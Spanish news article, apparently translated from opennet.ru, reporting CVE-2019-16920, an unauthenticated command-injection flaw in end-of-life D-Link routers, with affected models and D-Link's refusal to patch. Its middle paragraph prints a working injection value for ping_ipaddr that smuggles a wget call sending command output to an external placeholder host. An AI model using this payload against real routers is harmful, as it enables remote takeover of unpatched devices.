Vulnerabilidad explotable de forma remota en enrutadores D-Link

En enrutadores inalámbricos D-Link identificado vulnerabilidad peligrosa (CVE-2019–16920), que le permite ejecutar código de forma remota en el lado del dispositivo enviando una solicitud especial al controlador "ping_test", accesible sin autenticación.

Curiosamente, según los desarrolladores del firmware, la llamada "ping_test" debe ejecutarse solo después de la autenticación, pero en realidad se llama en cualquier caso, independientemente de iniciar sesión en la interfaz web. En particular, al acceder al script apply_sec.cgi y pasar el parámetro “action=ping_test”, el script redirige a la página de autenticación, pero al mismo tiempo realiza la acción asociada con ping_test. Para ejecutar el código, se utilizó otra vulnerabilidad en el propio ping_test, que llama a la utilidad ping sin comprobar adecuadamente la exactitud de la dirección IP enviada para la prueba. Por ejemplo, para llamar a la utilidad wget y transferir los resultados del comando "echo 1234" a un host externo, simplemente especifique el parámetro "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// prueba.prueba/?$(echo 1234)".

Vulnerabilidad explotable de forma remota en enrutadores D-Link

La presencia de la vulnerabilidad ha sido confirmada oficialmente en los siguientes modelos:

  • DIR-655 con firmware 3.02b05 o anterior;
  • DIR-866L con firmware 1.03b04 o anterior;
  • DIR-1565 con firmware 1.01 o anterior;
  • DIR-652 (no se proporciona información sobre versiones de firmware problemáticas)

El período de soporte para estos modelos ya expiró, por lo que D-Link dicho, que no lanzará actualizaciones para eliminar la vulnerabilidad, no recomienda su uso y aconseja reemplazarlos por nuevos dispositivos. Como solución alternativa de seguridad, puede limitar el acceso a la interfaz web únicamente a direcciones IP confiables.

Más tarde se descubrió que la vulnerabilidad también era afecta modelos DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 y DIR-825, cuyos planes para lanzar actualizaciones aún no se conocen.

Fuente: opennet.ru

Añadir un comentario